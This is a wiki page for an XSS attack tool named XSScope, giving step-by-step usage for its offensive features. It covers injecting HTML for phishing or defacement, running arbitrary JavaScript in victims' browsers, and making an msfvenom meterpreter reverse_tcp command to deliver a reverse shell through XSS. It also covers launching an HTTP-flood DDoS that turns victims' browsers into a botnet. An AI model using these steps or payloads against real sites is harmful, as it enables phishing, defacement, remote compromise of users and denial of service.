Skip to content

Possible attacks

kleiton0x00 edited this page Oct 19, 2020 · 2 revisions

Usage 1 - Hunting for XSS in Bug Bounty

  • Run xsscope.py by executing:
    python3 xsscope.py
  • Go to "XSS Build"
  • Copy the payloads and use them in websites and hopefully get a XSS.
  • (Optional) If you want to save all payloads as an intruder file, click Main -> Save as intruder

Usage 2 - Inject HTML code (Phishing or Website Deface)

  • Run xsscope.py by executing:
    python3 xsscope.py
  • Go to "Add HTML code"
  • Choose a pregenerated HTML codes from software, or add your own HTML code.
  • Click "Apply Code" when you finish.
  • Go to XSS Payloads (inside "Add HTML code" window)
  • Try 1 of our 10 payloads, or make your own, and paste it on the website.

Usage 3 - Execute Remote Javascript Code into the victim's browser

  • Run xsscope.py by executing:
    python3 xsscope.py
  • Go to Reverse Shell
  • On the new tab, enter your command and press Execute

Command examples:

alert(1)
prompt('js code execution by xsscope')
open('https://website.com')
document.querySelector('.title').textContent = 'Injected by XSScope' //This changes the title of the website
document.getElementsByTagName("img")[0].src = "https://website.com/image.png"; //This changes an image in the website

  • and so on... you can use any javascript code you want to be executed

Usage 4 - Execute .NET Shellcode commands

Note: When entering your command/payload, make sure they are base64-encoded.
Purpose: Getting an reverse shell by using Msfvenom payloads from a targeted user via XSS
Steps:

  1. Open a new terminal and generate a base64-encoded Reverse_tcp with Msfvenom
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.128.73 LPORT=4444 -f raw | base64
    generating_base64_encoded_payload
  2. The output (please refer to the photo) is our command which we will enter on XSScope
  3. Now open XSScope by executing on your terminal python3 xsscope.py
  4. Go to Agent Module
  5. Check on Execute .NET Shellcode commands
    preparing_js_payload
  6. Click Build Payload
  7. Click on Main and paste the payload we got on the first step
  8. Paste the payload into a Vulnerable Site and XSS payload is going to be triggered

Note: This is just a demo of the feature usage. You can use another C2 Framework and you can use different type of payload, as long as they are base64-encoded.

Usage 5 - Perform a DDoS attack

  1. Open XSScope and go to HTTP Flood (DDoS)
  2. Enter the URL you want to target
    Note: When entering the URL, please look at the following rules:

Correct URL format:

website.com/index.php
website.com/index.php?id=1 (recommended)
website.com/index.php?id=1&page=home (recommended)
website.com/index.php?id=1&page= (recommended)

Incorrect URL format:

website.com
http://website.com
https://website.com

  1. Check Use HTTPS if the website is using SSL/TSL certificate, otherwise don't check it.
  2. Choose how many threads you want the botnet to use (0-100).
    Note: The more threads you put, the more CPU power the victim uses and the higher the chances for the browser to freeze is.
  3. Once setup is done, click Launch attack